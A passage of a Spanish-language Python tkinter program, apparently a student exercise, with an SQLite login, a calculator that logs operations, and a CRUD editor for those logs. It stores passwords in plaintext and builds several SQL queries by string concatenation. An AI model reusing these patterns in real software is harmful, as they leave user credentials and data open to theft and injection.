global crear\r\n crear = Button(root, text=\"Crear cuenta\", command=crearCuenta,font=(\"Arial Bold\", 10))\r\n crear.grid(row=6, padx=5, pady=5)\r\n global sal\r\n sal = Button(root, text=\"Salir\", command=salirAplicacion,font=(\"Arial Bold\", 10))\r\n sal.grid(row=7, padx=5, pady=5)\r\n entryUsr.focus()\r\n\r\ndef acceder():\r\n Usr = entryUsr.get()\r\n Pass = entryPass.get()\r\n cursor.execute('''SELECT * FROM usuarios WHERE nombre = ? AND contraseña = ? ''',(Usr, Pass))\r\n if cursor.fetchone():\r\n texto.set(\"Calculadora\")\r\n calculadora()\r\n else:\r\n \tmesg.set(\"Los datos son\\nincorrectos!\")\r\n conexion.commit()\r\n\r\ndef crearCuenta():\r\n Usr = entryUsr.get()\r\n Pass = entryPass.get()\r\n\r\n if len(Usr) == 0 or len(Pass) == 0:\r\n return mesg.set(\"Los campos\\nson obligatorios\")\r\n elif len(Usr) < 4:\r\n return mesg.set(\"El nombre de\\nusuario es muy corto\\nMinimo 4 caracteres\")\r\n elif len(Pass) < 6:\r\n return mesg.set(\"La contraseña\\nes muy corta\\nMinimo 6 caracteres\")\r\n elif Usr == Pass:\r\n return mesg.set('No puedes usar\\nel nombre de\\ncontraseña')\r\n else:\r\n try:\r\n data = [Usr, Pass]\r\n cursor.execute(\"\"\"INSERT INTO usuarios VALUES (NUll,?,?)\"\"\",data)\r\n conexion.commit()\r\n mesg.set(\"Cuenta creada!\")\r\n except:\r\n return mesg.set(\"El nombre de usuario\\nya esta en uso\")\r\n\r\ndef calculadora():\r\n msg.grid_remove()\r\n crear.grid_remove()\r\n labelUsr.grid_remove()\r\n labelPass.grid_remove()\r\n entryUsr.grid_remove()\r\n entryPass.grid_remove()\r\n acc.grid_remove()\r\n sal.grid_remove()\r\n\r\n vfcmd = (root.register(on_validateF),'%S','%P')\r\n\r\n label = Label(root,font=(\"Arial Bold\", 10))\r\n label.grid(column=1, row=0, padx=5, pady=5)\r\n label.config(textvariable=texto )\r\n\r\n numero1 = Label(root, text=\"\\nNumero 1 \",font=(\"Arial Bold\", 10))\r\n numero1.grid(row=3, column=0, padx=5, pady=5, sticky=\"se\")\r\n \r\n entryNum = Entry(root, justify=CENTER, textvariable=n1,validate=\"key\", validatecommand=vfcmd)\r\n entryNum.grid(row=4, column=0, padx=5, pady=5, sticky=\"ne\" )\r\n \r\n \r\n numero2 = Label(root, text=\"\\nNumero 2\",font=(\"Arial Bold\", 10))\r\n numero2.grid(row=3, column=1, padx=5, pady=5, sticky=\"s\")\r\n \r\n entryNum2 = Entry(root, justify=CENTER, textvariable=n2,validate=\"key\", validatecommand=vfcmd)\r\n entryNum2.grid(row=4, column=1, padx=5, pady=5, sticky=\"n\")\r\n \r\n \r\n resultado = Label(root, text=\"\\nResultado\",font=(\"Arial Bold\", 10))\r\n resultado.grid(row=3, column=2, padx=5, pady=5, sticky=\"s\")\r\n \r\n resultado2 = Entry(root, justify=CENTER, state=DISABLED, textvariable=r)\r\n resultado2.grid(row=4, column=2, padx=5, pady=5, sticky=\"n\")\r\n \r\n \r\n mas = Button(root, text=\"+\", command=sumar,font=(\"Arial Bold\", 10))\r\n mas.grid(row=3,column=3, padx=5, pady=5, sticky=\"w\", ipadx=8, ipady=5)\r\n \r\n menos = Button(root, text=\"-\", command=restar,font=(\"Arial Bold\", 10))\r\n menos.grid(row=3,column=4, padx=5, pady=5, sticky=\"e\", ipadx=8, ipady=5)\r\n \r\n por = Button(root, text=\"x\", command=multiplicar,font=(\"Arial Bold\", 10))\r\n por.grid(row=4,column=3, padx=5, pady=5, sticky=\"w\", ipadx=8, ipady=5)\r\n \r\n entre = Button(root, text=\"/\", command=dividir,font=(\"Arial Bold\", 10))\r\n entre.grid(row=4,column=4, padx=5, pady=5, sticky=\"e\", ipadx=8, ipady=5)\r\n global bEdit\r\n bEdit = Button(root, text=\"Editar\", command=CRUD,font=(\"Arial Bold\", 10))\r\n bEdit.grid(row=3,column=5, padx=5, pady=5, sticky=\"w\")\r\n \r\n salr = 
Button(root, text=\"Salir\", command=salirAplicacion,font=(\"Arial Bold\", 10))\r\n    salr.grid(row=4,column=5, padx=5, pady=5, sticky=\"w\")\r\n    entryNum.focus()\r\n\r\n    n1.set('')\r\n    n2.set('')\r\n    r.set('')\r\n\r\ndef sumar():\r\n    global operacion\r\n    try:\r\n        r.set(float(n1.get()) + float(n2.get()))\r\n        operacion = \"+\"\r\n        commit()\r\n        borrar()\r\n        texto.set('se ha sumado correctamente')\r\n        if run:\r\n            actualizarHojaDeDatos()\r\n    except ValueError:\r\n        texto.set(\"Error-\\ningresa los campos correctamente\")\r\n    except Exception:\r\n        texto.set(\"Error-\\ningresa los campos correctamente\")\r\n\r\ndef restar():\r\n    global operacion\r\n    try:\r\n        r.set(float(n1.get()) - float(n2.get()))\r\n        operacion = \"-\"\r\n        commit()\r\n        borrar()\r\n        texto.set('se ha restado correctamente')\r\n        if run:\r\n            actualizarHojaDeDatos()\r\n    except ValueError:\r\n        texto.set(\"Error-\\ningresa los campos correctamente\")\r\n    except Exception:\r\n        texto.set(\"Error-\\ningresa los campos correctamente\")\r\n\r\ndef multiplicar():\r\n    global operacion\r\n    try:\r\n        r.set(float(n1.get()) * float(n2.get()))\r\n        operacion = \"*\"\r\n        commit()\r\n        borrar()\r\n        texto.set('se ha multiplicado correctamente')\r\n        if run:\r\n            actualizarHojaDeDatos()\r\n    except ValueError:\r\n        texto.set(\"Error-\\ningresa los campos correctamente\")\r\n    except Exception:\r\n        texto.set(\"Error-\\ningresa los campos correctamente\")\r\n\r\ndef dividir():\r\n    global operacion\r\n    try:\r\n        if float(n2.get()) != 0:  # check the divisor (n2), not the dividend\r\n            r.set(float(n1.get()) / float(n2.get()))\r\n            operacion = \"/\"\r\n            commit()\r\n            borrar()\r\n            texto.set('se ha dividido correctamente')\r\n            if run:\r\n                actualizarHojaDeDatos()\r\n        else:\r\n            texto.set(\"Error-\\nNo se puede dividir entre cero!\")\r\n    except ValueError:\r\n        texto.set(\"Error-\\ningresa los campos correctamente\")\r\n    except ZeroDivisionError:\r\n        texto.set(\"Error-\\nNo se puede dividir entre cero!\")\r\n    except Exception:\r\n        texto.set(\"Error-\\ningresa los campos correctamente\")\r\n\r\ndef borrar():\r\n    n1.set('')\r\n    n2.set('')\r\n\r\ndef commit():\r\n    locale.setlocale(locale.LC_ALL, 'es-MX')\r\n    dt = datetime.datetime.now(pytz.timezone('Asia/Kolkata'))\r\n    fecha = dt.strftime(\"%d/%m/%y\")\r\n    hora = dt.strftime(\"%I:%M:%S\")\r\n\r\n    resultado = r.get()\r\n    num1 = str(n1.get())\r\n    num2 = str(n2.get())\r\n    Usr = str(entryUsr.get())\r\n\r\n    cursor.execute('INSERT INTO logs (numero1, numero2, operacion, resultado, usuario, fecha, Hora) VALUES (?,?,?,?,?,?,?)',\r\n                   [\r\n                       num1,\r\n                       num2,\r\n                       operacion,\r\n                       resultado,\r\n                       Usr,\r\n                       fecha,\r\n                       hora\r\n                   ])\r\n    conexion.commit()\r\n\r\ndef ConexionBDU():\r\n    try:\r\n        cursor.execute('''CREATE TABLE \"usuarios\"\r\n                        (\"ID\"\tINTEGER NOT NULL UNIQUE,\r\n                        \"nombre\"\tVARCHAR(17) NOT NULL UNIQUE,\r\n                        \"contraseña\"\tVARCHAR(17) NOT NULL,\r\n                        PRIMARY KEY(\"ID\" AUTOINCREMENT))''')\r\n\r\n        cursor.execute(\"\"\"CREATE TABLE \"logs\" (\r\n                        \"ID\"\tINTEGER NOT NULL UNIQUE,\r\n                        \"Numero1\"\tVARCHAR(10) NOT NULL,\r\n                        \"Operacion\"\tVARCHAR(1) NOT NULL,\r\n                        \"Numero2\"\tVARCHAR(10) NOT NULL,\r\n                        \"Resultado\"\tVARCHAR(10) NOT NULL,\r\n                        \"Usuario\"\tVARCHAR(17) NOT NULL,\r\n                        \"Hora\"\tVARCHAR(10) NOT NULL,\r\n                        \"Fecha\"\tVARCHAR(10) NOT NULL,\r\n                        PRIMARY KEY(\"ID\" AUTOINCREMENT)\r\n        )\"\"\")\r\n\r\n        conexion.commit()\r\n    
except:\r\n pass\r\n\r\ndef CRUD():\r\n \r\n def wLog():\r\n if e1.get():\r\n cursor.execute(\"SELECT * FROM logs WHERE ID=\"+ e1.get())\r\n if cursor.fetchone() != None:\r\n id = e1.get()\r\n limpiar()\r\n for log in cursor.execute(\"SELECT * FROM logs WHERE ID=\"+id):\r\n e1.insert(0,log[0])\r\n e2.insert(0,log[1])\r\n e3.insert(0,log[2])\r\n e4.insert(0,log[3])\r\n e5.insert(0,log[4])\r\n e6.insert(0,log[5])\r\n e3.config(state=\"readonly\")\r\n e6.config(state=\"readonly\")\r\n else:\r\n messagebox.showerror(\"Error-\", \"El indice no existe!\")\r\n else:\r\n messagebox.showerror(\"Error-\", \"Introduce un indice!\")\r\n \r\n bEdit.config(state=DISABLED)\r\n global usrList\r\n usrList = [usr for usr in cursor.execute(\"SELECT nombre FROM usuarios\")]\r\n global raiz\r\n raiz = tkinter.Tk()\r\n raiz.geometry(\"275x300\")\r\n raiz.title(\"CRUD\")\r\n raiz.resizable(0, 0)\r\n vcmd = (raiz.register(on_validate),'%S', '%P')\r\n vfcmd = (raiz.register(on_validateF),'%S', '%P')\r\n Label(raiz, text=\"Editor de datos\",font=(\"Arial Bold\", 10), relief=\"ridge\", borderwidth=5).grid(column=1, row=0, sticky=\"w\")\r\n menubar=Menu(raiz)\r\n menuSalir=Menu(menubar, tearoff=0)\r\n crud=Menu(menubar, tearoff=0)\r\n opciones=Menu(menubar, tearoff=0)\r\n \r\n\r\n crud.add_command(label=\"Añadir\", command=crearRegistro)\r\n crud.add_command(label=\"Leer\", command=ventanaDeDatos)\r\n crud.add_command(label=\"actualizar\", command=actualizar)\r\n crud.add_command(label=\"Borrar\", command=borrarDatos)\r\n menubar.add_cascade(label=\"CRUD\", menu=crud)\r\n\r\n opciones.add_command(label=\"Limpiar campos\", command=limpiar)\r\n opciones.add_command(label=\"Escribir log\", command=wLog)\r\n menubar.add_cascade(label=\"Opciones\", menu=opciones)\r\n\r\n menuSalir.add_command(label=\"Salir\", command=salirAplicacion)\r\n menubar.add_cascade(label=\"Salir\", menu=menuSalir)\r\n\r\n\r\n raiz.config(cursor=\"hand1\",relief=\"ridge\",bd=15, menu=menubar)\r\n\r\n l1=Label(raiz, text=\"ID:\",font=(\"Arial Bold\", 10))\r\n l1.grid(column=0, row=2, sticky=\"e\")\r\n \r\n global e1\r\n e1=Entry(raiz,validate=\"key\", validatecommand=vcmd)\r\n e1.grid(column=1, row=2, sticky=\"w\")\r\n\r\n global l2\r\n l2=Label(raiz, text=\"Numero1:\",font=(\"Arial Bold\", 10))\r\n l2.grid(column=0, row=3, sticky=\"e\")\r\n \r\n global e2\r\n e2=Entry(raiz,validate=\"key\", validatecommand=vfcmd)\r\n e2.grid(column=1, row=3, sticky=\"w\")\r\n \r\n global l3\r\n l3=Label(raiz, text=\"Operacion:\",font=(\"Arial Bold\", 10))\r\n l3.grid(column=0, row=4, sticky=\"e\")\r\n \r\n global e3\r\n e3=ttk.Combobox(raiz, justify=\"center\",width=2, values=[\"+\", \"-\", \"x\", \"/\"],state=\"readonly\")\r\n e3.grid(column=1, row=4, sticky=\"w\")\r\n \r\n global l4\r\n l4=Label(raiz, text=\"Numero2:\",font=(\"Arial Bold\", 10))\r\n l4.grid(column=0, row=5, sticky=\"e\")\r\n \r\n global e4\r\n e4=Entry(raiz,validate=\"key\", validatecommand=vfcmd)\r\n e4.grid(column=1, row=5, sticky=\"w\")\r\n \r\n global l5\r\n l5=Label(raiz, text=\"Resultado:\",font=(\"Arial Bold\", 10))\r\n l5.grid(column=0, row=6, sticky=\"e\")\r\n \r\n global e5\r\n e5=Entry(raiz,validate=\"key\", validatecommand=vfcmd)\r\n e5.grid(column=1, row=6, sticky=\"w\")\r\n \r\n global l6\r\n l6=Label(raiz, text=\"Usuario:\",font=(\"Arial Bold\", 10))\r\n l6.grid(column=0, row=7, sticky=\"e\")\r\n\r\n global e6\r\n e6=ttk.Combobox(raiz, justify=\"left\",width=12,state=\"readonly\")\r\n e6['values']=usrList\r\n e6.grid(column=1, row=7, sticky=\"w\")\r\n \r\n global l7\r\n 
l7=Label(raiz, text=\"Hora:\",font=(\"Arial Bold\", 10))\r\n l7.grid(column=0, row=8, sticky=\"e\")\r\n \r\n global l8\r\n l8=Label(raiz, text=\"Fecha:\",font=(\"Arial Bold\", 10))\r\n l8.grid(column=0, row=9, sticky=\"e\")\r\n \r\n global b8\r\n global b7\r\n global b2\r\n b8=Button(raiz, text=\"Seleccionar fecha\", command=calendario,font=(\"Arial Bold\", 10))\r\n b8.grid(column=1, row=9, sticky=\"e\")\r\n \r\n b1=Button(raiz, text=\"Create\", command=crearRegistro,font=(\"Arial Bold\", 10))\r\n b1.place(x=0,y=242)\r\n \r\n b2=Button(raiz, text=\"Read\", command=ventanaDeDatos,font=(\"Arial Bold\", 10))\r\n b2.place(x=54,y=242)\r\n \r\n b3=Button(raiz, text=\"Update\", command=actualizar,font=(\"Arial Bold\", 10))\r\n b3.place(x=99,y=242)\r\n\r\n b4=Button(raiz, text=\"Delete\", command=borrarDatos,font=(\"Arial Bold\", 10))\r\n b4.place(x=156,y=242) \r\n\r\n b6=Button(raiz, text=\"Exit\", command=salirAplicacion,font=(\"Arial Bold\", 10))\r\n b6.place(x=209,y=242)\r\n\r\n b7=Button(raiz, text=\"Seleccionar hora\", command=selHora,font=(\"Arial Bold\", 10))\r\n b7.grid(column=1, row=8, sticky=\"w\")\r\n def salirEdit():\r\n try:\r\n bEdit.config(state=NORMAL)\r\n raiz.destroy()\r\n except:\r\n raiz.destroy()\r\n e1.focus()\r\n raiz.protocol(\"WM_DELETE_WINDOW\", salirEdit)\r\n raiz.mainloop() \r\n\r\ndef ventanaDeDatos():\r\n global run\r\n run = True\r\n b2.config(state=DISABLED)\r\n global datos\r\n datos = tkinter.Tk()\r\n datos.title(\"Hoja de datos\")\r\n tree = ttk.Treeview(datos, column=(\"c1\", \"c2\", \"c3\", \"c4\", \"c5\", \"c6\", \"c7\", \"c8\"), show='headings')\r\n \r\n for row in cursor.execute(\"SELECT * FROM logs\"):\r\n tree.insert(\"\", tkinter.END, values=row) \r\n tree.column(\"#1\", anchor=tkinter.CENTER, width=25)\r\n \r\n tree.heading(\"#1\", text=\"ID\")\r\n \r\n tree.column(\"#2\", anchor=tkinter.CENTER, width=50)\r\n \r\n tree.heading(\"#2\", text=\"Primero\")\r\n \r\n tree.column(\"#3\", anchor=tkinter.CENTER, width=40)\r\n \r\n tree.heading(\"#3\", text=\"/x-+\")\r\n \r\n tree.column(\"#4\", anchor=tkinter.CENTER, width=55)\r\n \r\n tree.heading(\"#4\", text=\"Segundo\")\r\n \r\n tree.column(\"#5\", anchor=tkinter.CENTER, width=75)\r\n \r\n tree.heading(\"#5\", text=\"Resultado\")\r\n \r\n tree.column(\"#6\", anchor=tkinter.CENTER, width=75)\r\n \r\n tree.heading(\"#6\", text=\"Usuario\")\r\n \r\n tree.column(\"#7\", anchor=tkinter.CENTER, width=50)\r\n \r\n tree.heading(\"#7\", text=\"Hora\")\r\n \r\n tree.column(\"#8\", anchor=tkinter.CENTER, width=125)\r\n \r\n tree.heading(\"#8\", text=\"Fecha\")\r\n def salirHojaDeDatos():\r\n global run\r\n datos.destroy()\r\n run = False\r\n try:\r\n b2.config(state=NORMAL)\r\n except:\r\n pass\r\n menubar=Menu(datos)\r\n menuOpciones=Menu(menubar, tearoff=0)\r\n\r\n menuOpciones.add_command(label=\"actualizar\", command=actualizarHojaDeDatos)\r\n menuOpciones.add_command(label=\"Salir\", command=salirHojaDeDatos)\r\n menubar.add_cascade(label=\"Opciones\", menu=menuOpciones)\r\n\r\n\r\n datos.resizable(0, 0)\r\n datos.config(cursor=\"hand1\",relief=\"ridge\",bd=15, menu=menubar) \r\n datos.protocol(\"WM_DELETE_WINDOW\",salirHojaDeDatos)\r\n \r\n tree.pack() \r\n\r\ndef actualizarHojaDeDatos():\r\n datos.destroy()\r\n ventanaDeDatos()\r\n\r\ndef crearRegistro():\r\n if e2.get():\r\n if e3.get():\r\n if e4.get():\r\n if e5.get():\r\n result()\r\n if e6.get():\r\n if resultadoAuto != None:\r\n if newTime:\r\n if newDate:\r\n datos=e2.get(),e3.get(),e4.get(),resultadoAuto,e6.get(),newTime,newDate\r\n 
cursor.execute(\"INSERT INTO logs VALUES(NULL,?,?,?,?,?,?,?)\", (datos))\r\n conexion.commit()\r\n messagebox.showinfo(\"BBDD\",\"Registro insertado con éxito\")\r\n limpiar()\r\n e3.config(state=\"readonly\")\r\n e6.config(state=\"readonly\")\r\n if run:\r\n actualizarHojaDeDatos()\r\n else:\r\n messagebox.showerror(\"Error-\", \"Introduce la fecha!\")\r\n else:\r\n messagebox.showerror(\"Error-\", \"Introduce la hora!\")\r\n else:\r\n pass\r\n else:\r\n messagebox.showerror(\"Error-\", \"Introduce el usuario!\") \r\n else:\r\n messagebox.showerror(\"Error-\", \"Introduce el resultado!\")\r\n else:\r\n messagebox.showerror(\"Error-\", \"Introduce el segundo numero!\")\r\n else:\r\n messagebox.showerror(\"Error-\", \"Introduce el signo!\")\r\n else:\r\n messagebox.showerror(\"Error-\", \"Introduce el primer numero!\")\r\n\r\ndef actualizar():\r\n if e1.get():\r\n cursor.execute(\"SELECT * FROM logs WHERE ID=\"+ e1.get())\r\n if cursor.fetchone() != None:\r\n if e2.get():\r\n if e3.get():\r\n if e4.get():\r\n if e5.get():\r\n result()\r\n if e6.get():\r\n if resultadoAuto != None:\r\n if newTime != None:\r\n if newDate != None:\r\n datos=e2.get(),e3.get(),e4.get(),resultadoAuto,e6.get(),newTime,newDate\r\n cursor.execute(\"UPDATE logs SET Numero1=?, Operacion=?, Numero2=?, Resultado=?, Usuario=?, Hora=?, Fecha=? \"+\r\n \"WHERE ID=\" + e1.get(),(datos))\r\n conexion.commit()\r\n messagebox.showinfo(\"BBDD\",\"Registro actualizado con éxito\")\r\n limpiar()\r\n e3.config(state=\"readonly\")\r\n e6.config(state=\"readonly\")\r\n if run:\r\n actualizarHojaDeDatos()\r\n else:\r\n messagebox.showerror(\"Error-\", \"Introduce una fecha!\") \r\n else:\r\n messagebox.showerror(\"Error-\", \"Introduce una hora!\")\r\n else:\r\n pass\r\n else:\r\n messagebox.showerror(\"Error-\", \"Introduce un usuario!\") \r\n else:\r\n messagebox.showerror(\"Error-\", \"Introduce un resultado!\") \r\n else:\r\n messagebox.showerror(\"Error-\", \"Introduce \\nel segundo numero!\") \r\n else:\r\n messagebox.showerror(\"Error-\", \"Introduce un signo!\") \r\n else:\r\n messagebox.showerror(\"Error-\", \"Introduce \\nel primer numero!\") \r\n else:\r\n messagebox.showerror(\"Error-\", \"El indice no existe!\") \r\n else:\r\n messagebox.showerror(\"Error-\", \"Introduce el indice que quieres actualizar!\") \r\n\r\ndef borrarDatos():\r\n\r\n if e1.get():\r\n cursor.execute(\"SELECT * FROM logs WHERE ID=\"+ e1.get())\r\n if cursor.fetchone() != None:\r\n r = messagebox.askyesno(\"Confirmar\", \"Estas seguro que\\nquieres eliminar este registro?\")\r\n if r:\r\n cursor.execute(\"DELETE FROM logs WHERE ID=\" + e1.get())\r\n conexion.commit()\r\n messagebox.showinfo(\"BBDD\",\"Registro borrado con éxito\")\r\n limpiar()\r\n else:\r\n messagebox.showerror(\"Error-\", \"El indice no existe\")\r\n\r\n else:\r\n messagebox.showerror(\"Error-\", \"Introduce el indice\\nque quieres eliminar!\")\r\n\r\ndef result():\r\n \r\n try:\r\n global resultadoAuto\r\n resultadoAuto = None\r\n if float(e2.get()) == 0 and e3.get() == \"/\":\r\n return messagebox.showerror(\"Error-\", \"No se puede dividir entre cero\")\r\n else:\r\n if e3.get() == \"+\":\r\n if float(e2.get()) + float(e4.get()) != float(e5.get()):\r\n valor=messagebox.askquestion(\"Error-\",\"El resultado que pusiste esta mal\\nquieres que se ponga el resultado correcto automaticamente?\")\r\n if valor == \"yes\":\r\n resultadoAuto = float(e2.get()) + float(e4.get())\r\n else:\r\n resultadoAuto = float(e5.get())\r\n else:\r\n resultadoAuto = float(e5.get())\r\n elif e3.get() 
== \"-\":\r\n                if float(e2.get()) - float(e4.get()) != float(e5.get()):\r\n                    valor=messagebox.askquestion(\"Error-\",\"El resultado que pusiste esta mal\\nquieres que se ponga el resultado correcto automaticamente?\")\r\n                    if valor == \"yes\":\r\n                        resultadoAuto = float(e2.get()) - float(e4.get())\r\n                    else:\r\n                        resultadoAuto = float(e5.get())\r\n                else:\r\n                    resultadoAuto = float(e5.get())\r\n            elif e3.get() == \"x\":\r\n                if float(e2.get()) * float(e4.get()) != float(e5.get()):\r\n                    valor=messagebox.askquestion(\"Error-\",\"El resultado que pusiste esta mal\\nquieres que se ponga el resultado correcto automaticamente?\")\r\n                    if valor == \"yes\":\r\n                        resultadoAuto = float(e2.get()) * float(e4.get())\r\n                    else:\r\n                        resultadoAuto = float(e5.get())\r\n                else:\r\n                    resultadoAuto = float(e5.get())\r\n            elif e3.get() == \"/\":\r\n                if float(e2.get()) / float(e4.get()) != float(e5.get()):\r\n                    valor=messagebox.askquestion(\"Error-\",\"El resultado que pusiste esta mal\\nquieres que se ponga el resultado correcto automaticamente?\")\r\n                    if valor == \"yes\":\r\n                        resultadoAuto = float(e2.get()) / float(e4.get())\r\n                    else:\r\n                        resultadoAuto = float(e5.get())\r\n                else:\r\n                    resultadoAuto = float(e5.get())\r\n    except NameError:\r\n        return messagebox.showerror(\"Error-\", \"Introduce un signo!\")\r\n    except ValueError:\r\n        return messagebox.showerror(\"Error-\", \"Introduce bien los campos!\")\r\n    except ZeroDivisionError:\r\n        return messagebox.showerror(\"Error-\", \"No se puede dividir entre cero\")\r\n\r\ndef limpiar():\r\n\r\n    e1.grid_forget()\r\n    e2.grid_forget()\r\n    e3.grid_forget()\r\n    e4.grid_forget()\r\n    e5.grid_forget()\r\n    e6.grid_forget()\r\n    def limpiar2():\r\n        global e1\r\n        global e2\r\n        global e3\r\n        global e4\r\n        global e5\r\n        global e6\r\n        global resultadoAuto\r\n        global newDate\r\n        global newTime\r\n\r\n        resultadoAuto = None\r\n        newDate = None\r\n        newTime = None\r\n        vcmd = (raiz.register(on_validate),'%S', '%P')\r\n        vfcmd = (raiz.register(on_validateF),'%S', '%P')\r\n        e1=Entry(raiz,validate=\"key\", validatecommand=vcmd)\r\n        e1.grid(column=1, row=2, sticky=\"w\")\r\n\r\n        e2=Entry(raiz,validate=\"key\", validatecommand=vfcmd)\r\n        e2.grid(column=1, row=3, sticky=\"w\")\r\n\r\n        e3=ttk.Combobox(raiz, justify=\"center\",width=2, values=[\"+\", \"-\", \"x\", \"/\"])\r\n        e3.grid(column=1, row=4, sticky=\"w\")\r\n\r\n        e4=Entry(raiz,validate=\"key\", validatecommand=vfcmd)\r\n        e4.grid(column=1, row=5, sticky=\"w\")\r\n\r\n        e5=Entry(raiz,validate=\"key\", validatecommand=vfcmd)\r\n        e5.grid(column=1, row=6, sticky=\"w\")\r\n\r\n        e6=ttk.Combobox(raiz, justify=\"left\",width=12)\r\n        e6['values']=usrList\r\n        e6.grid(column=1, row=7, sticky=\"w\")\r\n    limpiar2()\r\n\r\ndef selHora():\r\n    global hora\r\n    b7.config(state=DISABLED)\r\n    hora = Tk()\r\n    hora.resizable(0,0)\r\n    hora.title(\"Hora\")\r\n    hora.config(cursor=\"hand1\",relief=\"ridge\",bd=15)\r\n\r\n    def cancelHora():\r\n        hora.destroy()\r\n        try:\r\n            b7.config(state=NORMAL)\r\n        except:\r\n            pass\r\n\r\n    def confirmarHora():\r\n        confirmarButton.config(state=DISABLED)\r\n        global newTime\r\n        m = min_sb.get()    # note: min_sb holds the hour (0-23) despite its name\r\n        h = sec_hour.get()  # minutes spinbox\r\n        s = sec.get()       # seconds spinbox\r\n        t = f\"La hora seleccionada es {m}:{h}:{s}.\\nEs correcto?\"\r\n        res = messagebox.askquestion(\"Confirmar\", t)\r\n        if res == \"yes\":\r\n            newTime = f\"{m}:{h}:{s}\"\r\n            try:\r\n                hora.destroy()\r\n            except:\r\n                pass\r\n            try:\r\n                b7.config(state=NORMAL)\r\n            except:\r\n                pass\r\n        else:\r\n            try:\r\n                confirmarButton.config(state=NORMAL)\r\n            except:\r\n                pass\r\n    fone = Frame(hora)\r\n    ftwo = Frame(hora)\r\n\r\n    
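The confirmarHora callback above assembles the time string by hand from unpadded spinbox values. An illustrative helper (not part of the app) that zero-pads and range-checks the fields via datetime.time:

```python
# Normalize spinbox values into a validated, zero-padded HH:MM:SS string.
import datetime

def format_time(hours, minutes, seconds):
    # datetime.time raises ValueError if any field is out of range
    t = datetime.time(int(hours), int(minutes), int(seconds))
    return t.strftime('%H:%M:%S')

print(format_time(7, 5, 3))  # -> 07:05:03
```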
fone.pack(pady=10)\r\n ftwo.pack(pady=10)\r\n\r\n min_sb = Spinbox(\r\n ftwo,\r\n from_=0,\r\n to=23,\r\n wrap=True,\r\n width=2,\r\n state=\"readonly\",\r\n font=(\"Arial Bold\", 30),\r\n justify=CENTER\r\n )\r\n sec_hour = Spinbox(\r\n ftwo,\r\n from_=0,\r\n to=59,\r\n wrap=True,\r\n state=\"readonly\",\r\n font=(\"Arial Bold\", 30),\r\n width=2,\r\n justify=CENTER\r\n )\r\n\r\n sec = Spinbox(\r\n ftwo,\r\n from_=0,\r\n state=\"readonly\",\r\n to=59,\r\n wrap=True,\r\n textvariable=sec_hour,\r\n width=2,\r\n font=(\"Arial Bold\", 30),\r\n justify=CENTER\r\n )\r\n\r\n min_sb.pack(side=LEFT, fill=X, expand=True)\r\n sec_hour.pack(side=LEFT, fill=X, expand=True)\r\n sec.pack(side=LEFT, fill=X, expand=True)\r\n\r\n msg = Label(\r\n hora, \r\n text=\" Hora Minutos Segundos\",\r\n font=(\"Arial Bold\", 10),\r\n )\r\n msg.pack(side=TOP)\r\n\r\n confirmarButton =Button(\r\n hora,\r\n text=\"Confirmar\",\r\n font=(\"Arial Bold\", 10),\r\n padx=5,\r\n\r\n command=confirmarHora\r\n )\r\n confirmarButton.pack(side=RIGHT, pady=10, padx=20)\r\n\r\n cancelButton =Button(\r\n hora,\r\n text=\"Cancelar\",\r\n font=(\"Arial Bold\", 10),\r\n padx=5,\r\n\r\n command=cancelHora\r\n )\r\n cancelButton.pack(pady=10, padx=20, side=LEFT)\r\n\r\n\r\n hora.protocol(\"WM_DELETE_WINDOW\", confirmarHora)\r\n hora.mainloop()\r\n\r\ndef calendario():\r\n b8.config(state=DISABLED)\r\n global fecha \r\n fecha = tkinter.Tk()\r\n fecha.title(\"Fecha\")\r\n fecha.geometry(\"262x245\")\r\n global newDate\r\n\r\n cal = Calendar(fecha, locale=\"es_MX\", selectmode = 'day',\r\n year = 2021, month = 7,\r\n day = 19,font=(\"Arial Bold\", 10),\r\n showothermonthdays=False,\r\n showweeknumbers=False, \r\n mindate=datetime.date(year=2020, month=1, day=1), \r\n maxdate=datetime.date(year=2022, month=12, day=31))\r\n \r\n cal.grid(row=0 , column=0)\r\n def cancelCalendario():\r\n fecha.destroy()\r\n try:\r\n b8.config(state=NORMAL)\r\n except:\r\n pass\r\n\r\n def confirmarCalendario():\r\n bc.config(state=DISABLED)\r\n t = \"La fecha seleccionada es {}.\\nEs correcto?\".format(cal.get_date())\r\n v = messagebox.askyesno(\"Confirmar\", t)\r\n if v:\r\n global newDate\r\n newDate = cal.get_date()\r\n try:\r\n b8.config(state=NORMAL)\r\n except:\r\n pass\r\n try:\r\n fecha.destroy()\r\n except:\r\n pass\r\n else:\r\n try:\r\n bc.config(state=NORMAL)\r\n except:\r\n pass\r\n \r\n bc = Button(fecha, text = \"Confirmar\",width=10,\r\n command = confirmarCalendario,font=(\"Arial Bold\", 10))\r\n bc.place(x=126, y=182)\r\n Button(fecha, text = \"Cancelar\", width=10,\r\n command = cancelCalendario,font=(\"Arial Bold\", 10)).place(x=15, y=182)\r\n\r\n\r\n fecha.config(cursor=\"hand1\",relief=\"ridge\",bd=15)\r\n fecha.resizable(0,0)\r\n fecha.protocol(\"WM_DELETE_WINDOW\", confirmarCalendario)\r\n\r\n fecha.mainloop() \r\n\r\ndef on_validateN(text, new_text):\r\n if text.isalnum() and len(new_text) < 17:\r\n return True\r\n else:\r\n return False\r\n\r\ndef on_validateF(text, new_text):\r\n if all(c in \"0123456789.\" for c in text) and len(new_text) < 10:\r\n return True\r\n else:\r\n return False\r\n\r\ndef on_validate(text, new_text):\r\n if text.isdecimal() and len(new_text) < 3:\r\n return True\r\n else:\r\n return False\r\n\r\ndef salirAplicacion():\r\n \r\n valor=messagebox.askquestion(\"Salir\",\"¿Deseas salir de la aplicacion?\")\r\n if valor==\"yes\":\r\n root.destroy()\r\n try:\r\n raiz.destroy()\r\n except:\r\n pass\r\n try:\r\n datos.destroy()\r\n except:\r\n pass\r\n try:\r\n hora.destroy()\r\n except:\r\n pass\r\n try:\r\n 
fecha.destroy()\r\n    except:\r\n        pass\r\n\r\ninicio()\r\nroot.mainloop()\r\nconexion.close()","sub_path":"PythonEjercicio3.0/PythonEjercicio4.py","file_name":"PythonEjercicio4.py","file_ext":"py","file_size_in_byte":30910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"306489379","text":"# Print + and - alternately\n\n# print('Prints + and - alternately.')\n# n = 
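The final record is cut off in the source; only its opening comments (translated from Korean: "print + and - alternately") survive. A typical minimal version of such an exercise might look like the following hypothetical reconstruction, which is not the original file's code:

```python
# Hypothetical reconstruction based only on the record's comment.
n = 12  # number of symbols to print
for i in range(n):
    print('+' if i % 2 == 0 else '-', end='')
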